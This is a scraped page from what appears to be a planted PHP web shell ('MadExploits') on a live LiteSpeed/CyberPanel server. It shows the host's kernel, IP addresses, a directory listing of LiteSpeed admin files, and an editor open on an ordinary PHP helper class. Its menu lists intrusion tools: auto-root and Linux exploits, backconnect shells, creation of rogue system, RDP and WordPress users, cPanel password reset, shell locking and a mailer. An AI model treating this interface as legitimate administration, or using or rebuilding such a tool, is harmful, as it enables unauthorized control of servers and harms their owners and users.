Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
lsws /
admin /
html.open /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
ows
[ DIR ]
drwxr-xr-x
util
[ DIR ]
drwxr-xr-x
CAuthorizer.php
9.56
KB
-rw-r--r--
CData.php
36.55
KB
-rw-r--r--
CNode.php
21.42
KB
-rw-r--r--
CValidation.php
21.7
KB
-rw-r--r--
ControllerBase.php
15.46
KB
-rw-r--r--
DAttrBase.php
12.63
KB
-rw-r--r--
DAttrHelp.php
2.05
KB
-rw-r--r--
DInfo.php
16.55
KB
-rw-r--r--
DKeywordAlias.php
1.49
KB
-rw-r--r--
DMsg.php
8.01
KB
-rw-r--r--
DPage.php
3.62
KB
-rw-r--r--
DTbl.php
19.03
KB
-rw-r--r--
DTblDefBase.php
64.83
KB
-rw-r--r--
DTblMap.php
5.29
KB
-rw-r--r--
LogViewer.php
7.64
KB
-rw-r--r--
PathTool.php
4.63
KB
-rw-r--r--
PlainConfParser.php
9.46
KB
-rw-r--r--
SInfo.php
7.28
KB
-rw-r--r--
XmlParser.php
2.45
KB
-rw-r--r--
blowfish.php
25.68
KB
-rw-r--r--
jCryption.php
19.15
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : DAttrHelp.php
<?php class DAttrHelp { private $name; private $desc; private $tips; private $syntax; private $example; function __construct($name, $desc, $tips = null, $syntax = null, $example = null) { $this->name = $name; $this->desc = $desc; if ($tips) { $this->tips = str_replace('<br>', '<br/>', $tips); } $this->syntax = $syntax; $this->example = $example; } public function Render($blocked_version = 0) { $buf = '<a href="javascript:void(0);" rel="popover" data-placement="right" data-original-title="<i class=\'fa fa-fw fa-tag\'></i> <strong>' . $this->name . '</strong>" data-html="true" data-content=\'<div>'; switch ($blocked_version) { case 0: break; case 1: // LSWS ENTERPRISE; $buf .= ' <i>' . DMsg::UIStr('note_entfeature') . '</i>'; break; case 2: // LSWS 2CPU + case 3: // LSLB 2CPU + $buf .= ' <i>' . DMsg::UIStr('note_multicpufeature') . '</i>'; break; } $buf .= $this->desc . '<br><br>'; if ($this->syntax) { $buf .= '<div class="popover-mono"><strong>' . DMsg::UIStr('note_syntax') . ':</strong> ' . $this->syntax . '</div><br>'; } if ($this->example) { $buf .= '<div class="popover-mono"><strong>' . DMsg::UIStr('note_example') . ':</strong> ' . $this->example . '</div><br>'; } if ($this->tips) { $buf .= '<strong>' . DMsg::UIStr('note_tips') . ':</strong><ul type=circle>'; $tips = explode('<br/>', $this->tips); foreach ($tips as $ti) { $ti = trim($ti); if ($ti != '') $buf .= '<li>' . $ti . '</li>'; } $buf .= '</ul>'; } $buf .= '</div>\'><i class="icon-prepend fa fa-question-circle text-muted"></i></a>'; return $buf; } }
Close